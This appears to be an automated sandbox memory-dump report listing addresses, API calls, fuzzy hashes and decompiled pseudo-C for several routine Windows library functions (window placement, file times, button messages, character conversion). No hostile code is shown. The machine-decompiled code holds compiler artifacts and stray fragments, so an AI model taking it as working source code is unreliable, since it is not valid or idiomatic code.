0x0041e885
0x0041e88a
0x0041e88c
0x0041e88f
0x0041e89a
0x0041e89d
0x00000000
0x0041e923
0x0041e902
0x0041e905
0x0041e907
0x00000000
0x00000000
0x0041e909
0x0041e90b
0x0041e90d
0x00000000
0x00000000
0x0041e915
0x0041e91d
0x0041e91d
0x0041e92b
0x0041e92e
0x0041e936
0x0041e970
0x0041e970
0x0041e975
0x0041e97a
0x0041e97a
0x0041e97d
0x0041e982
0x0041e987
0x0041e987
0x0041e98d
0x0041e9fc
0x0041e9fc
0x0041ea01
0x0041ea04
0x0041ea04
0x0041ea0a
0x0041ea0f
0x0041ea16
0x0041ea1e
0x0041ea1e
0x0041ea23
0x0041ea26
0x0041ea28
0x0041ea2c
0x0041ea31
0x0041ea32
0x0041ea37
0x0041ea38
0x0041ea3b
0x0041ea3d
0x0041ea41
0x0041ea46
0x0041ea47
0x0041ea4c
0x0041ea4d
0x0041ea52
0x0041ea57
0x0041ea57
0x0041ea5a
0x0041ea5f
0x0041ea64
0x0041ea64
0x0041ea6a
0x0041ea78
0x0041e98f
0x0041e992
0x0041e995
0x0041e9f3
0x0041e9f6
0x00000000
0x0041e9f6
0x0041e997
0x0041e999
0x0041e9a0
0x0041e9a5
0x0041e9a8
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e9aa
0x0041e9aa
0x0041e9bf
0x0041e9bf
0x0041e9c7
0x0041e9ce
0x0041e9d6
0x0041e9dc
0x0041e9e2
0x0041e9e2
0x0041e9e5
0x0041e9eb
0x0041e9ee
0x00000000
0x0041e999
0x0041e98d
0x0041e938
0x0041e93d
0x0041e95c
0x0041e95c
0x0041e95e
0x0041e961
0x0041e966
0x0041e969
0x0041e96f
0x00000000
0x0041e95c
0x0041e93f
0x0041e942
0x0041e949
0x0041e94f
0x0041e953
0x0041e954
0x0041e959
0x00000000
0x0041e959
0x0041e8a3
0x0041e8a8
0x00000000
0x00000000
0x0041e8aa
0x0041e8ae
0x0041e8b1
0x0041e8b2
0x0041e8b7
0x0041e8bc
0x00000000
0x00000000
0x0041e8be
0x0041e8c3
0x00000000
0x00000000
0x0041e8c5
0x0041e8c8
0x0041e8c9
0x0041e8ce
0x0041e8d3
0x0041e8d9
0x0041e8db
0x0041e8e0
0x0041e8e8
0x0041e8eb
0x0041e8f1
0x0041e8f1
0x0041e8e0
0x0041e8f4
0x0041e8fa
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 0041E885
VariantClear.OLEAUT32(?), ref: 0041E949
CoTaskMemFree.OLE32(?,00000010), ref: 0041E9F6
CoTaskMemFree.OLE32(?,00000010), ref: 0041EA04

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeTask$ClearH_prolog3Variant
String ID:
API String ID: 365290523-0
Opcode ID: 1ff2745f75f00de284381f80d788ad7e1537649a783ad2c45fd4ee4ba2a88213
Instruction ID: 280745deb0a648077bdbf2c928ea08ec98ad9d9c8138371972030f75bccfc248
Opcode Fuzzy Hash: 1ff2745f75f00de284381f80d788ad7e1537649a783ad2c45fd4ee4ba2a88213
Instruction Fuzzy Hash: C6712879A00602DFCB20DFA6C9C49AEB7F1BF44304754496EE9469B761CB38EC85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041E4A8, Relevance: 6.2, APIs: 4, Instructions: 173
windowCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0041E4A8(signed int __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				intOrPtr* _t72;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t76;
				intOrPtr* _t77;
				intOrPtr* _t79;
				signed int _t81;
				signed int _t83;
				signed int _t87;
				intOrPtr* _t94;
				signed int _t95;
				signed int _t121;
				void* _t138;
				void* _t141;
				intOrPtr* _t142;
				signed int** _t144;
				signed int* _t145;
				signed int _t148;
				signed int _t150;
				void* _t152;
				void* _t155;

				_t138 = __edx;
				_t121 = __ecx;
				_t152 = _t155;
				_t148 = __ecx;
				_t62 =  *((intOrPtr*)(__ecx + 4));
				_push(_t141);
				if(_t62 != 0) {
					_t63 =  *(_t62 + 0x28);
					__eflags = _t63;
					if(_t63 == 0) {
						goto L3;
					} else {
						_t121 = _t63;
						_t67 = E00412138(_t121, __edx, _t141);
						__eflags = _t67;
						_v8 = _t67;
						if(_t67 == 0) {
							goto L3;
						} else {
							_t68 = IsWindowVisible( *(_t67 + 0x20));
							asm("sbb eax, eax");
							_t70 =  ~_t68 + 1;
							__eflags = _t70;
							_v24 = _t70;
							if(_t70 != 0) {
								GetWindowRect( *(E00410E42(0, _t152, GetDesktopWindow()) + 0x20),  &_v56);
								GetWindowRect( *(_v8 + 0x20),  &_v40);
								asm("cdq");
								asm("cdq");
								__eflags = _v56.right - _v56.left - _t138;
								E00415A15(_v8, _v56.right - _v56.left - _t138 >> 1, _v56.bottom - _v56.top - _t138 >> 1, 0, 0, 0);
								E00415A53(_v8, 1);
							}
							_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t148 + 4)) + 0x50));
							_t142 = _t148 + 0x48;
							_t73 =  *((intOrPtr*)( *_t72))(_t72, 0x43f348, _t142);
							__eflags = _t73;
							if(_t73 < 0) {
								_t75 =  *((intOrPtr*)( *((intOrPtr*)(_t148 + 4)) + 0x50));
								_t76 =  *((intOrPtr*)( *_t75))(_t75, 0x43f3a0,  &_v16);
								__eflags = _t76;
								if(_t76 >= 0) {
									_t77 = _v16;
									 *((intOrPtr*)( *_t77 + 0x14))(_t77,  &_v20);
									_t79 = _v16;
									 *((intOrPtr*)( *_t79 + 8))(_t79);
									_t81 = _v20;
									__eflags = _t81;
									if(_t81 != 0) {
										_t144 = _t148 + 8;
										_v12 =  *((intOrPtr*)( *_t81))(_t81, 0x441d94, _t144);
										_t83 = _v20;
										 *((intOrPtr*)( *_t83 + 8))(_t83);
										_t76 = _v12;
										__eflags = _t76;
										if(__eflags >= 0) {
											_t145 =  *_t144;
											 *( *_t145)(_t145, 0x441d84, _t148 + 0xc);
											goto L20;
										}
									} else {
										_t76 = 0x80004005;
									}
								}
							} else {
								_t94 =  *_t142;
								_t145 = _t148 + 0x4c;
								_t95 =  *((intOrPtr*)( *_t94 + 0xc))(_t94, 0, 0x442014, _t145);
								__eflags =  *_t145;
								_v12 = _t95;
								if( *_t145 == 0) {
									_v12 = 0x80004003;
								}
								__eflags = _v12;
								if(__eflags >= 0) {
									L20:
									_t87 = E0041D9D2(0, _t148, _t145, _t148, __eflags);
									__eflags = _v24;
									_t150 = _t87;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E00415A15(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E00415A53(_v8, 0);
									}
									_t76 = _t150;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E00415A15(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E00415A53(_v8, 0);
									}
									_t76 = _v12;
								}
							}
							return _t76;
						}
					}
				} else {
					L3:
					_push(_t152);
					_push(_t121);
					_t2 =  &_v76; // 0x44e938
					_v76 = 0x44e9d0;
					E00429326(_t2, 0x448990);
					asm("int3");
					_t66 = _t121;
					 *((intOrPtr*)(_t66 + 4)) = 1;
					return _t66;
				}
			}

0x0041e4a8
0x0041e4a8
0x0041e4a9
0x0041e4b0
0x0041e4b2
0x0041e4b9
0x0041e4ba
0x0041e4c1
0x0041e4c4
0x0041e4c6
0x00000000
0x0041e4c8
0x0041e4c8
0x0041e4ca
0x0041e4cf
0x0041e4d1
0x0041e4d4
0x00000000
0x0041e4d6
0x0041e4d9
0x0041e4e1
0x0041e4e3
0x0041e4e3
0x0041e4e4
0x0041e4e7
0x0041e502
0x0041e50e
0x0041e519
0x0041e528
0x0041e529
0x0041e52e
0x0041e538
0x0041e538
0x0041e540
0x0041e545
0x0041e54f
0x0041e551
0x0041e553
0x0041e5b4
0x0041e5c3
0x0041e5c5
0x0041e5c7
0x0041e5cd
0x0041e5d7
0x0041e5da
0x0041e5e0
0x0041e5e3
0x0041e5e6
0x0041e5e8
0x0041e5f3
0x0041e5ff
0x0041e602
0x0041e608
0x0041e60b
0x0041e60e
0x0041e610
0x0041e612
0x0041e620
0x00000000
0x0041e620
0x0041e5ea
0x0041e5ea
0x0041e5ea
0x0041e5e8
0x0041e555
0x0041e555
0x0041e559
0x0041e564
0x0041e567
0x0041e569
0x0041e56c
0x0041e56e
0x0041e56e
0x0041e575
0x0041e578
0x0041e622
0x0041e624
0x0041e629
0x0041e62c
0x0041e62e
0x0041e63e
0x0041e648
0x0041e651
0x0041e651
0x0041e656
0x0041e57e
0x0041e57e
0x0041e581
0x0041e591
0x0041e59b
0x0041e5a4
0x0041e5a4
0x0041e5a9
0x0041e5a9
0x0041e578
0x0041e65c
0x0041e65c
0x0041e4d4
0x0041e4bc
0x0041e4bc
0x00415838
0x0041583b
0x00415841
0x00415845
0x0041584c
0x00415851
0x00415852
0x00415854
0x0041585b
0x0041585b

APIs

IsWindowVisible.USER32(?), ref: 0041E4D9
GetDesktopWindow.USER32 ref: 0041E4E9
GetWindowRect.USER32 ref: 0041E502
GetWindowRect.USER32 ref: 0041E50E

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$DesktopVisible
String ID:
API String ID: 1055025324-0
Opcode ID: 91f3dabe833c9e8fd0501810abfa2945bc11cbf6981de9ef4f3e2dc2afdddab8
Instruction ID: 065e16437cb013eb7775d7e254ef6c980541ab395ef9088f91af82c3a1d6bdba
Opcode Fuzzy Hash: 91f3dabe833c9e8fd0501810abfa2945bc11cbf6981de9ef4f3e2dc2afdddab8
Instruction Fuzzy Hash: A551F975A0060AEFCB00DFA9C984CEEB7B9EF88344B64456AF505E7261C734AD80CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00414EBE, Relevance: 6.1, APIs: 4, Instructions: 132
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00414EBE(void* __ecx, void* __eflags, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t52;
				long _t56;
				signed int* _t75;
				signed int* _t78;
				signed int* _t81;
				struct _FILETIME* _t88;
				void* _t100;
				CHAR* _t101;
				signed int* _t102;
				void* _t103;
				void* _t107;

				_t102 = _a4;
				_t100 = __ecx;
				E004277B0(__ecx, _t102, 0, 0x128);
				E00414516(_t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
				_t52 =  *(_t100 + 4);
				_t107 = _t52 -  *0x43f774; // 0xffffffff
				if(_t107 == 0) {
					L21:
					return 1;
				}
				_t88 =  &_v12;
				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
					_t56 = GetFileSize( *(_t100 + 4), 0);
					_t102[6] = _t56;
					_t102[7] = 0;
					if(_t56 != 0xffffffff || 0 != 0) {
						_t101 =  *(_t100 + 0xc);
						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
						} else {
							_t102[8] = 0;
						}
						if(E00414BED( &_v12) == 0) {
							 *_t102 = 0;
							_t102[1] = 0;
						} else {
							_t81 = L00414D07(0,  &_v36,  &_v12, 0xffffffff);
							 *_t102 =  *_t81;
							_t102[1] = _t81[1];
						}
						if(E00414BED( &_v20) == 0) {
							_t102[4] = 0;
							_t102[5] = 0;
						} else {
							_t78 = L00414D07(0,  &_v36,  &_v20, 0xffffffff);
							_t102[4] =  *_t78;
							_t102[5] = _t78[1];
						}
						if(E00414BED( &_v28) == 0) {
							_t102[2] = 0;
							_t102[3] = 0;
						} else {
							_t75 = L00414D07(0,  &_v36,  &_v28, 0xffffffff);
							_t102[2] =  *_t75;
							_t102[3] = _t75[1];
						}
						if(( *_t102 | _t102[1]) == 0) {
							 *_t102 = _t102[2];
							_t102[1] = _t102[3];
						}
						if((_t102[4] | _t102[5]) == 0) {
							_t102[4] = _t102[2];
							_t102[5] = _t102[3];
						}
						goto L21;
					} else {
						goto L2;
					}
				}
				L2:
				return 0;
			}

0x00414ec6
0x00414ed3
0x00414ed5
0x00414ee8
0x00414eed
0x00414ef3
0x00414ef9
0x0041500d
0x00000000
0x0041500f
0x00414f07
0x00414f14
0x00414f21
0x00414f2a
0x00414f2d
0x00414f30
0x00414f36
0x00414f3c
0x00414f54
0x00414f3e
0x00414f3e
0x00414f3e
0x00414f62
0x00414f7e
0x00414f80
0x00414f64
0x00414f6d
0x00414f74
0x00414f79
0x00414f79
0x00414f8e
0x00414faf
0x00414fb2
0x00414f90
0x00414f99
0x00414fa0
0x00414fa6
0x00414fa6
0x00414fc0
0x00414fe1
0x00414fe4
0x00414fc2
0x00414fcb
0x00414fd2
0x00414fd8
0x00414fd8
0x00414fec
0x00414ff1
0x00414ff6
0x00414ff6
0x00414fff
0x00415004
0x0041500a
0x0041500a
0x00000000
0x00000000
0x00000000
0x00000000
0x00414f30
0x00414f16
0x00000000

APIs

_memset.LIBCMT ref: 00414ED5

Part of subcall function 00414516: _wctomb_s.LIBCMT ref: 00414526

GetFileTime.KERNEL32(?,?,?,?), ref: 00414F0C
GetFileSize.KERNEL32(?,00000000), ref: 00414F21

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: File$SizeTime_memset_wctomb_s
String ID:
API String ID: 26245289-0
Opcode ID: d6e0b33cdd3456abbaf0845211ed6f1b0bd95a8d5a4668eaf176b5079c58f16d
Instruction ID: 23fea5bd0db28a64f34b1a5e744c4fd6cae80ca152edd476642d3e85ee4241de
Opcode Fuzzy Hash: d6e0b33cdd3456abbaf0845211ed6f1b0bd95a8d5a4668eaf176b5079c58f16d
Instruction Fuzzy Hash: F0412A719046059FCB20DF69D9818EBB7F8BB483147104A2EE1AAD7790E734F985CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00415DFE, Relevance: 6.1, APIs: 4, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00415DFE(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				void* __esi;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E004219BC( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E0040B523( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E0040B523( &_a4)));
								_v8 =  *((intOrPtr*)(E0040B523( &_a4)));
								if((E00415B1A(_t37, 0) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E00415C05( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E00415C05( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E00415B1A(_t63, 0);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}

0x00415e01
0x00415e02
0x00415e05
0x00415e0c
0x00415e12
0x00415e17
0x00415e27
0x00415e40
0x00415e48
0x00415e50
0x00415e53
0x00415e5d
0x00415e9e
0x00415e73
0x00415e77
0x00415e84
0x00000000
0x00415e86
0x00415e86
0x00415e8c
0x00000000
0x00415ef9
0x00415ef9
0x00415ef9
0x00000000
0x00415ef9
0x00415e8c
0x00000000
0x00415e84
0x00415ea9
0x00415eb3
0x00415ef2
0x00415ec9
0x00415ece
0x00415ed1
0x00415ee6
0x00415ee6
0x00415ef0
0x00000000
0x00000000
0x00415ed3
0x00415ee1
0x00000000
0x00415ee3
0x00415ee3
0x00000000
0x00415ee3
0x00415ee1
0x00000000
0x00415ed1
0x00415e29
0x00415e32
0x00415e37
0x00415e3a
0x00415efc
0x00415f05
0x00000000
0x00000000
0x00000000
0x00415e3a
0x00415f07
0x00415f07
0x00415e17
0x00415f0b

APIs

SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00415E32
SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00415E97
SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00415EDC
SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 00415F05

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9bce053c1cee47bc9ce1531ae6b29b82336330bcc2760f422429b1ee26c5cdd9
Instruction ID: 0b41f8eff2d773fa09359674444bc7586dee749000be6048f57e8c50777e1ce6
Opcode Fuzzy Hash: 9bce053c1cee47bc9ce1531ae6b29b82336330bcc2760f422429b1ee26c5cdd9
Instruction Fuzzy Hash: 5C319E30900219FFCB25DF55C880EEA7BA9EF81394F14806BF5059B251CB78AE80DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00435032, Relevance: 6.1, APIs: 4, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00435032(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E004260A5( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E0043427F( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00427761(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x0043503a
0x00435041
0x00435056
0x00000000
0x00435048
0x0043504a
0x00435062
0x00435067
0x0043506a
0x0043506d
0x00435096
0x0043509b
0x0043509f
0x00435120
0x00435132
0x0043513b
0x0043513d
0x0043507d
0x0043507d
0x00435080
0x00435082
0x00435085
0x00435085
0x00435085
0x00435085
0x00000000
0x0043508b
0x004350ff
0x004350ff
0x00435104
0x0043510a
0x0043510d
0x0043510f
0x00435112
0x00435112
0x00435112
0x00435112
0x00000000
0x00435116
0x004350a1
0x004350a4
0x004350a4
0x004350aa
0x004350ad
0x004350d4
0x004350d7
0x004350d7
0x004350dd
0x00000000
0x00000000
0x004350df
0x004350e2
0x00000000
0x00000000
0x004350e4
0x004350e4
0x004350e7
0x004350e7
0x004350ed
0x0043505b
0x0043505b
0x004350f6
0x00000000
0x004350f6
0x004350af
0x004350b2
0x00000000
0x00000000
0x004350b6
0x004350c4
0x004350c7
0x004350cd
0x004350cf
0x004350d2
0x00000000
0x00000000
0x00000000
0x004350d2
0x0043506f
0x00435072
0x00435074
0x0043507a
0x0043507a
0x00000000
0x0043504c
0x0043504c
0x00435051
0x00435053
0x00435053
0x00000000
0x00435051
0x0043504a

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00435062
__isleadbyte_l.LIBCMT ref: 00435096
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,004339C4,?,?,00000002), ref: 004350C7
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,004339C4,?,?,00000002), ref: 00435135

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 63403934cacca2e15b0b6a9800fa7f19a68f32b042b0ebbd6affa4635d10a33c
Instruction ID: 0bf0738c9ace6297569e59e7ba4eebf9fd374feabd3dfcc72ac15a41c85834b8
Opcode Fuzzy Hash: 63403934cacca2e15b0b6a9800fa7f19a68f32b042b0ebbd6affa4635d10a33c
Instruction Fuzzy Hash: 1B311431A04689EFDF24DF64C8809BE3BB4BF09310F1595AAE4648B291E336DD40DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401C50, Relevance: 6.1, APIs: 4, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C50(intOrPtr* __ecx, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				CHAR* _v8;
				void* _v12;
				signed short _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t24;
				intOrPtr _t27;
				void* _t34;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr* _t41;
				CHAR* _t42;
				void* _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t61;
				struct HINSTANCE__* _t62;
				intOrPtr _t67;
				void* _t69;
				void* _t70;

				_push(__ebp);
				_t41 = __ecx;
				_t24 =  *__ecx;
				_t67 =  *((intOrPtr*)(_t24 - 0xc));
				_t45 = _a8;
				_t56 = _a4 - _t24;
				_t61 = _t45 + _t67;
				if((0x00000001 -  *((intOrPtr*)(_t24 - 4)) |  *((intOrPtr*)(_t24 - 8)) - _t61) < 0) {
					_push(_t61);
					E00401D80(__ecx, __ecx, _t56);
					_t45 = _a4;
				}
				_t27 =  *_t41;
				if(_t56 <= _t67) {
					_a4 = _t27 + _t56;
				}
				E00425DFA(_t41, _t45, _t27 + _t67, _t45, _a4, _t45);
				_t70 = _t69 + 0x10;
				if(_t61 < 0) {
					L7:
					_push(0x80070057);
					E00401D00(_t41, _t45, _t56, _t61, _t67);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_v16 = _v16 & 0x0000ffff;
					_push(_t41);
					_t42 = _v8;
					__eflags = _t42 & 0xffff0000;
					_push(_t61);
					_push(_t56);
					_t57 = _t45;
					 *(_t57 + 0x58) = _t42;
					if(__eflags == 0) {
						__eflags =  *(_t57 + 0x54);
						if(__eflags == 0) {
							 *(_t57 + 0x54) = _t42 & 0x0000ffff;
						}
					}
					_t62 =  *(E0040E67F(_t42, _t57, _t61, __eflags) + 0xc);
					_t43 = LoadResource(_t62, FindResourceA(_t62, _t42, 5));
					_t34 = E0040C9A0(_t57, _t43,  *((intOrPtr*)(_t70 + 0x18)), _t62);
					FreeResource(_t43);
					return _t34;
				} else {
					_t38 =  *_t41;
					if(_t61 >  *((intOrPtr*)(_t38 - 8))) {
						goto L7;
					} else {
						 *((intOrPtr*)(_t38 - 0xc)) = _t61;
						_t39 =  *_t41;
						 *((char*)(_t61 + _t39)) = 0;
						return _t39;
					}
				}
			}

0x00401c51
0x00401c53
0x00401c55
0x00401c57
0x00401c5a
0x00401c63
0x00401c70
0x00401c77
0x00401c79
0x00401c7c
0x00401c81
0x00401c81
0x00401c87
0x00401c89
0x00401c8e
0x00401c8e
0x00401c9c
0x00401ca1
0x00401ca6
0x00401cbf
0x00401cbf
0x00401cc4
0x00401cc9
0x00401cca
0x00401ccb
0x00401ccc
0x00401ccd
0x00401cce
0x00401ccf
0x00401cd5
0x0040c9d9
0x0040c9da
0x0040c9de
0x0040c9e4
0x0040c9e5
0x0040c9e6
0x0040c9e8
0x0040c9eb
0x0040c9ed
0x0040c9f1
0x0040c9f6
0x0040c9f6
0x0040c9f1
0x0040c9fe
0x0040ca18
0x0040ca1d
0x0040ca25
0x0040ca30
0x00401ca8
0x00401ca8
0x00401cad
0x00000000
0x00401caf
0x00401caf
0x00401cb2
0x00401cb5
0x00401cbc
0x00401cbc
0x00401cad

APIs

_memcpy_s.LIBCMT ref: 00401C9C

